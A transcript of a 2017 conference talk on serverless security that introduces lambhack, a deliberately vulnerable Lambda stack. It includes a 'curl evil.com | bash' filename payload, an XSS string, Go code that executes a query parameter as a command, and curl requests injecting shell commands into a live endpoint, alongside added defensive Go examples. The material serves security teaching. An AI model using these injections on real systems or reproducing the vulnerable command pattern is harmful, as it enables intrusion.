Serverless Security: Are you ready for the Future?

Posted on 05-Apr-2017


#RSAC

James Wickett

Serverless Security: Are you ready for the Future?

ASD-F01

Head of Research, Signal Sciences, @wickett

James Wickett
- Head of Research at Signal Sciences
- Author, DevOps Fundamentals at lynda.com
- Author of a book on DevOps (email me for a free copy > james@signalsciences.com)
- Blogger at theagileadmin.com and labs.signalsciences.com

Conclusion

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
- New serverless patterns are just emerging
- Security with serverless is easier
- Security with serverless is harder

Conclusion (2)

Four key areas apply to serverless security:
- Software Supply Chain Security
- Delivery Pipeline Security
- Data Flow Security
- Attack Detection

New! A very vulnerable lambda stack open source project: github.com/wickett/lambhack

What is Serverless?

Misconceptions

It’s Marketing (cloud rebranded)

Serverless == no servers

Serverless == Backend as a Service

Serverless == Platform as a Service

TK: AdrianCO quote

So, what is Serverless?

http://martinfowler.com/articles/serverless.html

@mikebroberts

"Serverless was first used to describe applications that significantly or fully depend on 3rd party applications / services (‘in the cloud’) to manage server-side logic and state." http://martinfowler.com/articles/serverless.html

"Serverless can also mean applications where some amount of server-side logic is still written by the application developer but unlike traditional architectures is run in stateless compute containers that are event-triggered, ephemeral (may only last for one invocation), and fully managed by a 3rd party." http://martinfowler.com/articles/serverless.html

History of Serverless
- 2012 - used to describe BaaS and Continuous Integration services run by third parties
- Late 2014 - AWS launched Lambda
- July 2015 - AWS launched API Gateway
- October 2015 - AWS re:Invent - The Serverless company using AWS Lambda
- 2015 to present - Frameworks forming
- 2016 - Serverless Conference

http://www.slideshare.net/AmazonWebServices/arc308-the-serverless-company-using-aws-lambda

Old School Arch (diagram): Client, Proxy/LB, Server, Server, Server, Database

Serverless Arch (diagram): Client, Auth Service, API Gateway, Database Service, Function A, Function B, Web Delivery

What can we say is serverless?

Serverless is Functions As a Service (FaaS)

Containers on Demand

Serverless is (no management of) Servers

Serverless IS SERVICEFULL

Serverless is an opinionated framework for compute

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.

A Short History of Cloud

Virtualization

“The Cloud”

DEVOPS

SaaS, PaaS, IaaS

Private Cloud

Then, along came containers

containers are teh hawtness

Lots of effort in Container Orchestration

The Cloud was to Virtualization as Serverless will be to Containers

"If you want to lead your company bravely into the new world, you would do well to focus a lot on how serverless will evolve." - @Cloudopinion https://medium.com/@cloud_opinion/the-pattern-may-repeat-26de1e8b489d

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.

So, what are the upsides?
- Scaling built in
- Pay for what you use in 100 ms increments
- With Serverless, system administration is (mostly) lower
- Serverless is implicit Microservices
- Short Circuits Ops and moves infrastructure runtime closer to devs
- You can skip Chefing and Dockering all the things!
- Lean Startup Friendly
- Increased Velocity

Great, what’s the catch?
- Ops Burden to rationalize Serverless model (specifically Deploy)
- Monitoring
- Logging
- Stateless for Real with no persistence* across function runs
- Vendor Lock-In
- Security
- Reliability

Serverless Use cases
- Image resizing
- Queue processing (http://martinfowler.com/articles/serverless.html)
- Run a web application
- API Gateway (http://martinfowler.com/articles/serverless.html)
- CI/CD

Security is the same and different

What used to be system calls is now distributed computing over the network

Serverless shifts attack surface to third parties

Let’s try a sample application in AWS

Go Sparta
- Golang!
- AWS Lambda supports bring your own binary
- Sparta wraps your binary with a node.js shim

Other options
- Serverless Framework
- APEX
- Kappa

Wordy
- Analyzes textual occurrences given a block of text, returns JSON count of words
- Calls an API under the hood to get the text
- It is comprised of Lambda, s3, API Gateway

go run main.go provision -s S3_BUCKET

What I learned about serverless security

Security

Four areas of Serverless Security
- Secure Software Supply Chain
- Delivery Pipeline
- Data Flow Security
- Attack Detection

Secure Software Supply Chain

Surface area Reduction!

Surface area Expansion!

SSL / TLS from the Provider (diagram: Old Way vs New Way)

Routing from the provider (diagram: Old Way vs New Way)

Lambda + s3 + kinesis + DynamoDB + cloudformation + API Gateway + Auth0

Abuse of open IAM privs

https://media.ccc.de/v/33c3-7865-gone_in_60_milliseconds

Recommendation: Use a third-party service to monitor for provider config changes

Provider Security
- Disable root access keys
- Manage users with profiles
- Secure your keys in your deploy system
- Secure keys in dev system
- Use provider MFA

Delivery Pipeline Security

Unit Testing (diagram: Easier to mock vs Harder to mock)

Integration Testing

Configuration is part of delivery

Simple Deploy Pipeline Security
- Only dev keys can push to ‘dev’
- Only the build/deploy system can push to pre-prod
- Integration tests must pass in this env
- Security validation must take place
- Allow push to prod only by the deploy system

Security Integration Testing
- BDD-Security - github.com/continuumsecurity/bdd-security
- Gauntlt - gauntlt.org

http://www.slideshare.net/wickett/pragmatic-security-and-rugged-devops-sxsw-2015

Data Flow Security
- Development: Data Flow Diagrams, Threat modeling
- Runtime

"Your provider is responsible for the underlying infrastructure and services. You are responsible for ensuring you use the services in a secure manner." https://read.acloud.guru/adopting-serverless-architectures-and-security-254a0c12b54a

Application layer DoS

Timeouts and Execution restrictions

Attack Detection

https://medium.com/@PaulDJohnston/security-and-serverless-ec52817385c4

AppSec Greatest Hits (XSS, SQLi, Cmdexe) still relevant 15 years later!

AppSec Problems

Types of Attacks
- XSS, Injection, Deserialization, …
- New surface area, similar problems
- e.g. appending ‘curl evil.com | bash’ or <script>alert(1)</script> to a filename you upload on s3

Defense
- Logging, emitting events
- Vandium (SQLi) wrapper
- Content Security Policy (CSP)
- More things need to be done here…
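As an added example for the "logging, emitting events" line (this is not code from the talk or from lambhack): a small Go scanner, Go being the language lambhack is written in, that runs over constructed access-log request lines and flags the query-string payloads shown in the cmdexe demo and the XSS filename example. The line format, the sample lines and the names ScanAccessLog and inspectValue are assumptions.

```go
package main

import (
	"fmt"
	"net/url"
	"strings"
)

// Constructed sample request lines (path plus query, as an access log records them).
var sampleLog = []string{
	"/prod/serverless-audit/c?args=kernel",
	"/prod/serverless-audit/c?args=uname+-a;+sleep+1",
	"/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1",
	"/prod/wordy?text=hello+world",
	"/prod/wordy?text=%3Cscript%3Ealert(1)%3C/script%3E",
}

// Finding is one flagged request parameter and the reason it was flagged.
type Finding struct{ Path, Param, Value, Reason string }

// inspectValue reports why a decoded parameter looks hostile, or "" if benign.
func inspectValue(v string) string {
	switch {
	case strings.ContainsAny(v, ";|&`$"):
		return "shell metacharacter"
	case strings.Contains(strings.ToLower(v), "<script"):
		return "html script tag"
	}
	return ""
}

// ScanAccessLog flags query parameters whose decoded value carries shell
// metacharacters or script tags. The query is split by hand because Go's
// url.Values parsing drops any pair containing ';' (since Go 1.17), which would hide exactly these payloads.
func ScanAccessLog(lines []string) []Finding {
	var findings []Finding
	for _, line := range lines {
		path, rawQuery, _ := strings.Cut(line, "?")
		for _, pair := range strings.Split(rawQuery, "&") {
			name, raw, _ := strings.Cut(pair, "=")
			v, err := url.QueryUnescape(raw)
			if err != nil {
				v = raw // keep undecodable values visible instead of dropping them
			}
			if why := inspectValue(v); why != "" {
				findings = append(findings, Finding{path, name, v, why})
			}
		}
	}
	return findings
}

func main() { fmt.Printf("%+v\n", ScanAccessLog(sampleLog)) }
```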

New Thing Alert!

Want to make the point that appsec is still relevant in serverless: a vulnerable Lambda + API Gateway stack (born from the heritage of WebGoat, Rails Goat and Gruyere, …)

Introducing lambhack

lambhack
- A Vulnerable Lambda + API Gateway stack
- Open Source, MIT licensed
- Released for the first time here at RSA
- Includes arbitrary code execution in a query string
- More work needed, PRs accepted and looking for community help
- github.com/wickett/lambhack

//command := lambdaEvent.PathParams["command"]
command := lambdaEvent.QueryParams["args"]
output := runner.Run(command)

Vulnerable code is also vulnerable in Serverless
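The hardened counterpart to the snippet above, as an added example in Go (not lambhack's code or Sparta's API; the allow-list, the keys kernel and version, and the names ResolveCommand and RunCommand are assumptions): the query parameter only selects a pre-built argv, no shell is ever involved, and a timeout bounds the run.

```go
package main

import (
	"context"
	"errors"
	"fmt"
	"os/exec"
	"strings"
	"time"
)

// ErrNotAllowed is returned for anything that is not a vetted command.
var ErrNotAllowed = errors.New("command not allowed")

// allowed maps an "args" query value to a fixed argv. The allow-list is an
// assumption for this example; lambhack deliberately has none.
var allowed = map[string][]string{
	"kernel":  {"uname", "-r"},
	"version": {"cat", "/proc/version"},
}

// shellMeta: the characters that let "uname -a; sleep 1" become two commands.
const shellMeta = ";|&$`<>(){}\n"

// ResolveCommand maps the untrusted "args" query parameter to a vetted argv.
// Anything off the allow-list or carrying a shell metacharacter is refused.
func ResolveCommand(args string) ([]string, error) {
	if strings.ContainsAny(args, shellMeta) {
		return nil, ErrNotAllowed
	}
	argv, ok := allowed[strings.TrimSpace(args)]
	if !ok {
		return nil, ErrNotAllowed
	}
	return argv, nil
}

// RunCommand executes a vetted argv directly (no shell) under a hard timeout,
// so one invocation cannot run longer than the function is allowed to.
func RunCommand(argv []string, timeout time.Duration) (string, error) {
	ctx, cancel := context.WithTimeout(context.Background(), timeout)
	defer cancel()
	out, err := exec.CommandContext(ctx, argv[0], argv[1:]...).CombinedOutput()
	return string(out), err
}

func main() {
	_, err := ResolveCommand("uname -a; sleep 1") // the talk's injected query
	fmt.Println("refused:", err)
}
```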

Let’s take a look at cmdexe in lambhack

uname -a

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=uname+-a;+sleep+1"
> Linux ip-10-36-34-119 4.4.35-33.55.amzn1.x86_64 #1 SMP Tue Dec 6 20:30:04 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux

cat /proc/version

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=cat+/proc/version;+sleep+1"
> Linux version 4.4.35-33.55.amzn1.x86_64 (mockbuild@gobi-build-60006) (gcc version 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) ) #1 SMP Tue Dec 6 20:30:04 UTC 2016

Let’s see /tmp

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+-la+/tmp;+sleep+1"
> total 17916
> drwx------ 2 sbx_user1056 490 4096 Feb 8 22:02 .
> drwxr-xr-x 21 root root 4096 Feb 8 21:47 ..
> -rwxrwxr-x 1 sbx_user1056 490 18334049 Feb 8 22:02 Sparta.lambda.amd64

Lambda Reuse!

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=ls+/tmp;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/pargs=touch+/tmp/wickettfile;+sleep+1"
$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/args=ls+/tmp;+sleep+1"
> Sparta.lambda.amd64 wickettfile

Could we upload our own payload?

$ curl "https://XXXX.execute-api.us-east-1.amazonaws.com/prod/serverless-audit/c?args=which+curl;+sleep+1"
> /usr/bin/curl

XSS, SQLi, … More to come!

email me if you are interested: james@signalsciences.com

Conclusion

Serverless encourages functions as deploy units, coupled with third party services that allow running end-to-end applications without worrying about system operation.
- New serverless patterns are just emerging
- Security with serverless is easier
- Security with serverless is harder

Conclusion (2)

Four key areas apply to serverless security:
- Software Supply Chain Security
- Delivery Pipeline Security
- Data Flow Security
- Attack Detection

New! A very vulnerable lambda stack open source project: github.com/wickett/lambhack

Let’s talk!

James Wickett, james@signalsciences.com, @wickett